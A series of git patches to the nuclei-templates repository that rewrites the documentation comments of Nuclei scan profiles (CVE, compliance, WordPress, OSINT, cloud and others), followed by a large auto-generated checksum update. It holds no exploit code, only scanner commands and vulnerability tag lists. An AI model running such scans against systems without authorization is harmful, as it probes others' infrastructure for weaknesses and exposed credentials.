Vulnerabilities and Exposures (CVEs) using Nuclei. +# +# Purpose: +# This profile is focused on identifying vulnerabilities listed in the Common Vulnerabilities and Exposures (CVE) database. Detecting CVEs is essential for mitigating risks associated with known security flaws in software and systems. +# +# Included Templates: +# This configuration references specific templates designed to detect CVEs: +# - http/cves/: This directory contains templates for detecting CVEs in HTTP-based services. +# - http/cnvd/: This directory contains templates for detecting vulnerabilities listed in the Chinese National Vulnerability Database (CNVD). +# - network/cves/: This directory contains templates for detecting CVEs in network services. +# - javascript/cves/: This directory contains templates for detecting CVEs in JavaScript-based applications. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile cves -u https://example.com templates: - http/cves/ From e9f93a9806e9f03d88405f133ca1b74d001786fb Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 12:56:29 +0530 Subject: [PATCH 0556/1841] Update compliance.yml --- profiles/compliance.yml | 41 ++++++++++++++++++++++++++++++++++------- 1 file changed, 34 insertions(+), 7 deletions(-) diff --git a/profiles/compliance.yml b/profiles/compliance.yml index 65e5be0b1b..544a1958f8 100644 --- a/profiles/compliance.yml +++ b/profiles/compliance.yml @@ -1,9 +1,36 @@ -# This is a configuration file for the compliance template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/compliance.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Compliance Detection +# +# This configuration file is specifically tailored for detecting compliance-related issues using Nuclei. +# +# Purpose: +# This profile is focused on identifying a wide range of security issues to ensure compliance with various security standards and best practices. It includes templates for detecting misconfigurations, vulnerabilities, exposures, and other security risks. +# +# Included Templates: +# This configuration references specific templates tagged with various security-related tags to cover comprehensive compliance scanning: +# - misconfig: Templates for detecting misconfigurations. +# - cve: Templates for detecting Common Vulnerabilities and Exposures. +# - exposure: Templates for detecting sensitive information exposures. +# - default-login: Templates for detecting default login credentials. +# - xss: Templates for detecting Cross-Site Scripting vulnerabilities. +# - lfi: Templates for detecting Local File Inclusion vulnerabilities. +# - edb: Templates for vulnerabilities listed in the Exploit Database. +# - rce: Templates for detecting Remote Code Execution vulnerabilities. +# - sqli: Templates for detecting SQL Injection vulnerabilities. +# - unauth: Templates for detecting unauthorized access vulnerabilities. +# - ssrf: Templates for detecting Server-Side Request Forgery vulnerabilities. +# - redirect: Templates for detecting open redirection vulnerabilities. +# - disclosure: Templates for detecting sensitive information disclosure. +# - takeover: Templates for detecting subdomain takeover vulnerabilities. +# - traversal: Templates for detecting directory traversal vulnerabilities. +# - generic: Templates for detecting generic security issues. +# - deserialization: Templates for detecting deserialization vulnerabilities. +# - ssl: Templates for detecting SSL/TLS related issues. +# - keys: Templates for detecting exposed keys. +# - token: Templates for detecting exposed tokens. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile compliance -u https://example.com tags: - misconfig @@ -26,4 +53,4 @@ tags: - deserialization - ssl - keys - - token \ No newline at end of file + - token From 5d318558162b156cb2607f5c428f0d6eff2d55d4 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:00:07 +0530 Subject: [PATCH 0557/1841] Update all.yml --- profiles/all.yml | 26 +++++++++++++++++++------- 1 file changed, 19 insertions(+), 7 deletions(-) diff --git a/profiles/all.yml b/profiles/all.yml index 6d16f50a89..a8da13bca9 100644 --- a/profiles/all.yml +++ b/profiles/all.yml @@ -1,13 +1,25 @@ -# This is a configuration file for the all template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Comprehensive Detection +# +# This configuration file is specifically tailored for performing comprehensive scans using Nuclei, All the avaliable templates are loaded using this profile. +# +# Purpose: +# This profile is focused on identifying a wide range of security issues across different types of protocols and services. It includes templates for HTTP, TCP, JavaScript, DNS, and SSL to ensure thorough coverage of potential vulnerabilities. +# +# Included Templates: +# This configuration references specific templates designed for comprehensive scanning: +# - http: Templates for detecting vulnerabilities in HTTP-based services. +# - tcp: Templates for detecting vulnerabilities in TCP-based services. +# - javascript: Templates for detecting vulnerabilities that are written using the javascript protocol. +# - dns: Templates for detecting vulnerabilities in DNS services. +# - ssl: Templates for detecting SSL/TLS related issues. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile all -u https://example.com + type: - http - tcp - javascript - dns - ssl - From b79226932ac9ea47b46f98b7282bb3c97e711ea6 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:01:22 +0530 Subject: [PATCH 0558/1841] Update wordpress.yml --- profiles/wordpress.yml | 20 ++++++++++++++------ 1 file changed, 14 insertions(+), 6 deletions(-) diff --git a/profiles/wordpress.yml b/profiles/wordpress.yml index 393836cb68..fd22d449dd 100644 --- a/profiles/wordpress.yml +++ b/profiles/wordpress.yml @@ -1,9 +1,17 @@ -# This is a configuration file for the wordpress template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'profiles' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a profiles profile: -# nuclei -config profiles/wordpress.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for WordPress Detection +# +# This configuration file is specifically tailored for detecting vulnerabilities in WordPress installations using Nuclei. +# +# Purpose: +# This profile is focused on identifying security issues specific to WordPress, including vulnerable plugins, themes, and core components. Ensuring the security of WordPress installations is crucial due to its widespread use and common targeting by attackers. +# +# Included Templates: +# This configuration references specific templates tagged with 'wordpress' to cover comprehensive WordPress scanning: +# - wordpress: Templates for detecting vulnerabilities and misconfigurations in WordPress installations, plugins, and themes. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile wordpress -u https://example.com tags: - wordpress From ea1186188bce63cad29c8b4c0398e6f20048b45a Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:03:44 +0530 Subject: [PATCH 0559/1841] Update misconfigurations.yml --- profiles/misconfigurations.yml | 24 +++++++++++++++++------- 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/profiles/misconfigurations.yml b/profiles/misconfigurations.yml index d98bc8fa02..6b7c1c6114 100644 --- a/profiles/misconfigurations.yml +++ b/profiles/misconfigurations.yml @@ -1,11 +1,21 @@ -# This is a configuration file for the misconfigurations template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Misconfigurations Detection +# +# This configuration file is specifically tailored for detecting misconfigurations using Nuclei. +# +# Purpose: +# This profile is focused on identifying various misconfigurations that can lead to security vulnerabilities. Detecting and correcting misconfigurations is essential for maintaining the security and integrity of systems and applications. +# +# Included Templates: +# This configuration references specific templates designed to detect misconfigurations: +# - http/misconfiguration/: Templates for detecting misconfigurations in HTTP-based services. +# - network/misconfig/: Templates for detecting misconfigurations in network services. +# - javascript/misconfiguration/: Templates written using javascript protocol for detecting misconfigurations in applications. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile misconfigurations -u https://example.com templates: - http/misconfiguration/ - network/misconfig/ - - javascript/misconfiguration/ \ No newline at end of file + - javascript/misconfiguration/ From b73250af35de3442aabe1142f81f588dc840d820 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:06:27 +0530 Subject: [PATCH 0560/1841] Update osint.yml --- profiles/osint.yml | 33 ++++++++++++++++++++++++++------- 1 file changed, 26 insertions(+), 7 deletions(-) diff --git a/profiles/osint.yml b/profiles/osint.yml index c1ef4efff3..b718ce875d 100644 --- a/profiles/osint.yml +++ b/profiles/osint.yml @@ -1,9 +1,28 @@ -# This is a configuration file for the osint template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for OSINT Detection +# +# This configuration file is specifically tailored for detecting Open Source Intelligence (OSINT) related issues using Nuclei. +# +# Purpose: +# This profile is focused on identifying various OSINT-related security risks, including exposed information, backdoors, command and control servers, and more. OSINT scanning helps in gathering intelligence that could be used to identify potential threats and vulnerabilities. +# +# Included Templates: +# This configuration references specific templates tagged with various OSINT-related tags to cover comprehensive OSINT scanning: +# - osint: Templates for detecting OSINT-related vulnerabilities and exposures. +# - honeypot: Templates for detecting honeypots. +# - backdoor: Templates for detecting backdoors. +# - c2: Templates for detecting command and control servers. +# - osint-social: Templates for detecting social media related exposures. +# - exposures: Templates for detecting exposed sensitive information. +# - malware: Templates for detecting malware-related activities. +# - enum: Templates for enumeration activities. +# - phishing: Templates for detecting phishing-related issues. +# +# Included Tags: +# This configuration also includes additional templates tagged with 'phishing' for a more focused detection. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile osint -u https://example.com tags: - osint @@ -17,4 +36,4 @@ tags: - phishing include-tags: - - phishing \ No newline at end of file + - phishing From 814a092cfcbf1f073ea7b3ec5219fe730db37722 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:07:48 +0530 Subject: [PATCH 0561/1841] Update aws-cloud-config.yml --- profiles/aws-cloud-config.yml | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/profiles/aws-cloud-config.yml b/profiles/aws-cloud-config.yml index c637526139..e434125e87 100644 --- a/profiles/aws-cloud-config.yml +++ b/profiles/aws-cloud-config.yml @@ -1,4 +1,20 @@ -# Nuclei scan profile for scanning aws ACLs +# Nuclei Configuration Profile for Scanning AWS ACLs +# +# This configuration file is specifically tailored for detecting issues in AWS Access Control Lists (ACLs) using Nuclei. +# +# Purpose: +# This profile is focused on identifying misconfigurations and vulnerabilities in AWS ACLs. Proper configuration of ACLs is crucial for securing AWS resources and ensuring that only authorized entities have access. +# +# Included Templates: +# This configuration references specific templates tagged with 'aws-cloud-config' to cover comprehensive scanning of AWS ACLs. +# +# Configuration: +# The profile also includes code templates to enhance detection capabilities. +# Additionally, it sets a variable for the AWS region to 'us-east-1' for template inputs. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile aws-acls -u https://example.com code: true # enable code templates @@ -6,4 +22,4 @@ tags: - aws-cloud-config # filter templates with "aws-cloud-config" tags var: - - region=us-east-1 # template input for "region" variable \ No newline at end of file + - region=us-east-1 # template input for "region" variable From a3880102a35da511a152601b7c6a767447935f13 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:08:48 +0530 Subject: [PATCH 0562/1841] Update cloud.yml --- profiles/cloud.yml | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/profiles/cloud.yml b/profiles/cloud.yml index 45455c520a..30ca16211b 100644 --- a/profiles/cloud.yml +++ b/profiles/cloud.yml @@ -1,10 +1,19 @@ -# This is a configuration file for the cloud template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/cloud.yml -list target_list_to_scan.txt +# Nuclei Configuration Profile for Cloud Detection +# +# This configuration file is specifically tailored for detecting cloud-related vulnerabilities and misconfigurations using Nuclei. +# +# Purpose: +# This profile is focused on identifying security issues in cloud environments. It includes templates that help detect vulnerabilities and misconfigurations in cloud services and infrastructure, ensuring the security of cloud deployments. +# +# Included Templates: +# This configuration references specific templates tagged with 'cloud' and 'devops' to cover comprehensive scanning of cloud environments: +# - cloud: Templates for detecting vulnerabilities and misconfigurations in cloud services. +# - devops: Templates for detecting issues related to DevOps practices in cloud environments. +# +# Running this profile +# You can run this profile using the following command: +# nuclei -profile cloud -u https://example.com tags: - cloud - - devops \ No newline at end of file + - devops From 6c898bcab1306f446649379c9836130fe28ea5ea Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 07:41:03 +0000 Subject: [PATCH 0564/1841] Auto Generated Templates Checksum [Tue Jun 25 07:41:03 UTC 2024] :robot: --- templates-checksum.txt | 446 ++++++++++++++++++++--------------------- 1 file changed, 223 insertions(+), 223 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 309fafe281..2abe9125e6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -695,11 +695,11 @@ helpers/wordlists/wordpress-plugins.txt:57232b538c5faddd4dd6e3adeb1864421764440d helpers/wordlists/wordpress-themes.txt:3424134fa69db08604545ecf1441cf6330bf0982 helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b -helpers/wordpress/plugins/ad-inserter.txt:08d2e98e6754af941484848930ccbaddfefe13d6 +helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f221e helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:f454be7d464d6c09f200806744a41ceb54f6bcfd +helpers/wordpress/plugins/advanced-custom-fields.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:4a74356d25940a094bf92b6722f74e38e3ad55ec @@ -707,10 +707,10 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:41d75a1151922be816d326fae3 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:97d362c1e174c59583bc075f9c4f790b095f0935 +helpers/wordpress/plugins/astra-sites.txt:9bab51b354b67876c6284de28df0e549940fb873 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 -helpers/wordpress/plugins/backwpup.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca +helpers/wordpress/plugins/backwpup.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 @@ -748,7 +748,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f -helpers/wordpress/plugins/elementor.txt:2b0e38d303e042a2d07cda096a0cdeb1c652e196 +helpers/wordpress/plugins/elementor.txt:d66c7300e5cd945308f5af8da71dabbe7590aee1 helpers/wordpress/plugins/elementskit-lite.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 @@ -784,7 +784,7 @@ helpers/wordpress/plugins/hostinger.txt:2eb538e42b910c397ab801353b059c51f265f092 helpers/wordpress/plugins/image-optimization.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 -helpers/wordpress/plugins/insert-headers-and-footers.txt:1467c965873cc632279bc3b451f12414b23902fc +helpers/wordpress/plugins/insert-headers-and-footers.txt:b02d54c37a0b10952ea10194f9d0deec6e24ff40 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c @@ -810,7 +810,7 @@ helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/meta-box.txt:193731126fc28e1c2848ea069e492a3a46c5fcf4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 -helpers/wordpress/plugins/newsletter.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 +helpers/wordpress/plugins/newsletter.txt:4b84a805a8aa871bbce0fa320591b0526c93757d helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 helpers/wordpress/plugins/ninja-forms.txt:a16cd18f1019f04b207109b189b504edbde41ab2 @@ -830,7 +830,7 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:71912467feb2c9dd9cf4980fe27207c145471f4c helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef729d6ec9d -helpers/wordpress/plugins/premium-addons-for-elementor.txt:167005dc36e245ab157aa813a088cff941fda8d5 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:e84ad28997bf6ae8ece163b8b89ecd5f073ccae6 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d @@ -885,7 +885,7 @@ helpers/wordpress/plugins/woocommerce-payments.txt:356ef5627363fd1b4d41745a26ed9 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:0aaa3cea7451675ff270540e13308210d8fce9ab helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 -helpers/wordpress/plugins/woocommerce.txt:ef691a1cf1ef79929e634736f9069bccdc166400 +helpers/wordpress/plugins/woocommerce.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 @@ -912,7 +912,7 @@ helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f1 helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a helpers/wordpress/plugins/wpforms-lite.txt:62156312501df259d1213db5481c36daaa321adc -helpers/wordpress/plugins/wps-hide-login.txt:0a6497b3debb49e99679808d2c227d762982f1ae +helpers/wordpress/plugins/wps-hide-login.txt:69e7167e89117a318c489d464a95dbda36c0d526 helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 @@ -4601,7 +4601,7 @@ http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4 http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b http/exposed-panels/tracer-sc-login.yaml:57902ac871a95304f034d0aa4a2cb96f04cad2a6 http/exposed-panels/traefik-dashboard.yaml:19db275a7effc62cc9fee16ae6e6b4ac81b98635 -http/exposed-panels/trellix-panel.yaml:1fe6fdd35d63a0e347e24a780b7fa57a6e62507e +http/exposed-panels/trellix-panel.yaml:11b8a41da81bf4dc46c5a373e8c909b36130c29c http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360ef2cc7e590547d75bc83 http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943 @@ -7185,227 +7185,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:702d9ad28927671bb2b198387694667abc971de6 -http/technologies/wordpress/plugins/add-to-any.yaml:b6a9117115040cc51058f069bfe6a456f2ea4116 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:f7094dfd4684eb5411df9525a4ede88c35862213 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:2194fae4e6285f26a0ae8c64c042d90a112a4aad -http/technologies/wordpress/plugins/akismet.yaml:e459a9572a25dd878278113026687839d0b16339 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:58d4ef573d4fd9b189f11e966b9942550df5c97c -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:086d7dffb5b8bd279241a9c9452637c6f6feedb4 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:a9fbcdd7a6003cd0b343df8acab2c60b00ea8058 -http/technologies/wordpress/plugins/amp.yaml:957044c3f381b457ac95f0ac05065d656e36d08b -http/technologies/wordpress/plugins/antispam-bee.yaml:6df78afb426acac4bfa2cc6cca6664e5081df4bc -http/technologies/wordpress/plugins/astra-sites.yaml:8d2b36315eda5fbb14c86af8be9505ccfacba964 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:91d1d77ffa3a9af69b2ffa37c95826ac6d49b011 -http/technologies/wordpress/plugins/backwpup.yaml:a270e9facc70b9c9cd1b27cba7e0d1578904904e -http/technologies/wordpress/plugins/better-search-replace.yaml:5e338f5f74375f5fa27fe6f0d4f7b3005a20ef10 -http/technologies/wordpress/plugins/better-wp-security.yaml:90c50090c744cb18433da162557185a8a8748a30 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4ad13534a88f46f0803f30f347d2f7a7be192fbc -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:b419f19d5e04c7f4c621dd75459bb3bcc806fa99 -http/technologies/wordpress/plugins/breeze.yaml:1ce0dc9fcba907f0ccfe1082376819f3ea2e1107 -http/technologies/wordpress/plugins/broken-link-checker.yaml:38b6a209601a20cdce5d4fc0be7d53dab5af4bfd -http/technologies/wordpress/plugins/child-theme-configurator.yaml:ad12b659e466a30ac35c1a59296223fcde5c8add -http/technologies/wordpress/plugins/classic-editor.yaml:1fcca72e5d3665214eb7559d64ba4685fd56199f -http/technologies/wordpress/plugins/classic-widgets.yaml:f77a6070735e93482e559a9f0ddca609f84eaebc -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:7338643c21fffb63ab2282c6d41d384a82970d5f +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:1a6696a9d5717be8ff15ab7ed878d487cbbd7f8b -http/technologies/wordpress/plugins/coblocks.yaml:5e0c4c706f2e1170a3f26baed5df0384ad9d3350 -http/technologies/wordpress/plugins/code-snippets.yaml:a39371ec3eb3cfef242bd95946b09194d8bdae4a -http/technologies/wordpress/plugins/coming-soon.yaml:542f21fc7f45d206ea58483c5cb3553589e2861c -http/technologies/wordpress/plugins/complianz-gdpr.yaml:396b007d0919789a3a82839ee2a07dac3f150f08 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:c43607a6508219d86f92f8f9321ace27c3989694 -http/technologies/wordpress/plugins/contact-form-7.yaml:7c1b7178a19f4c372464099718a0472432713b10 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:4615f95bf32e8f98503bbad231f877e2ceefcbc6 -http/technologies/wordpress/plugins/cookie-law-info.yaml:720df0dcdf08279b40909634521652c40f87a1a2 -http/technologies/wordpress/plugins/cookie-notice.yaml:58f0c15ddac4e1aaaf925152d5229acd1f3fa88b -http/technologies/wordpress/plugins/copy-delete-posts.yaml:fc86ea6331f695c86a561cde177c012e432ba32d -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fdcc126726f27430ea83bfed258cd68adf0a5e0c -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:aa1c9ed637e6a4aa3d7a63884a15185674d35382 -http/technologies/wordpress/plugins/custom-css-js.yaml:cca94f974ce92d0afc9c9d9f7a3d48a76ac46b70 -http/technologies/wordpress/plugins/custom-fonts.yaml:456790c7b3897d8708a9fa0452ec5511139149ef -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:d308c27c503eade1f23efd1f59d438677e6051fe 